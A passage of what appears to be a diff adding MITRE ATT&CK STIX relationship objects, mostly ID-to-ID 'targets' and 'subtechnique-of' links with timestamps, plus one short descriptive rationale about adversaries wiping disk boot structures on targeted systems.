"relationship--f86ed9dd-6587-462a-b309-3b8158271ff2", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f89da5b1-4513-43d1-b01c-8eafc6ea2201", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f8aaf144-17a2-41b5-b723-a80cb43a8c75", + "created": "2020-10-02T16:47:16.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f8adc0cb-dafa-40c8-acff-4dc6fc213477", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f8b5abf2-0569-4ee2-b39b-7ffc84792c26", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f8b73155-d3fb-41d8-8ec9-d8f2a01d2458", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f8c320cc-97f5-4b3a-8847-92c42b6a48b7", + "created": "2020-02-11T18:27:15.862Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", + "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f8f57cb0-11c1-48ac-8d29-00c8a99db4e1", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f901ad15-19d4-47ac-92d4-90d54f21c6ef", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f91d8791-5d79-4d41-83db-54b3e1edc657", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f92764db-a880-4726-9d28-a035170f790c", + "created": "2023-09-28T21:22:35.236Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:22:35.236Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f94410e3-ff8c-4538-83b6-c666e33d2327", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f9672583-d9a4-46d2-8cde-09c1af4284c7", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f9682e28-c32e-4aa1-a1aa-647306a78930", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f96dd8b2-6b49-4a64-a867-a571a9c0016e", + "created": "2024-05-23T04:17:26.163Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:39:45.734Z", + "description": "Asset Mapping Rationale: Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. On a network devices, adversaries may reformat the file system using Network Device CLI commands such as format", + "relationship_type": "targets", + "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f97352ba-1e93-4496-84d7-d8b330022635", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f9820b56-ce35-481e-9044-c7b52e806ff5", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f983035d-8095-44b3-9e85-85b62f19430e", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f9867ca2-18a1-4e84-ad1d-61d7c85fe4b3", + "created": "2020-06-23T19:12:25.121Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f9907fb1-976b-4f51-ac13-b45f2ff9452b", + "created": "2023-09-28T19:48:37.072Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:48:37.072Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f995ebc4-665b-4628-a902-a6dd98aceb9b", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f9b97ad8-22eb-47d6-8844-62535f857fa9", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f9cbb048-3213-48dc-a5d7-3c6008fc18ad", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f9d6ebe5-ace1-41ab-8bdc-9682b3d99364", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f9eb0bcb-1d22-437d-b02d-495c62e87425", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f9fb683f-ee80-42cd-980a-872a28db789e", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fa031084-d847-43ed-8fb3-ff59446b2cb7", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fa045626-38ff-495b-a890-894426b20d75", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fa1d441c-8358-4969-899a-a30e63d92e74", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fa34ced0-9f96-46e2-981c-05d19ac3e9ea", + "created": "2024-06-25T13:20:28.866Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-25T13:20:28.866Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fa41cf1f-759f-4cbe-a705-bb50bb53f88a", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fa445f10-fb1c-4911-8829-cf1d7d3abc38", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fa4f1259-7eb7-4f98-9443-eee261ea29aa", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fa685d16-57dd-4d23-8856-8f446377904b", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fa6c989c-edfa-4084-af10-566f42a999e9", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fa7600a8-389c-436e-a27a-ff4a52a410ee", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--faa59a4c-3f60-450a-bbb3-0d01ae856cab", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fac4bc88-af9b-4eec-b041-e4138b49c3c0", + "created": "2023-09-29T16:28:04.180Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:28:04.180Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fadbdca3-3c98-497c-a156-e53b89664359", + "created": "2023-09-28T20:16:55.038Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": 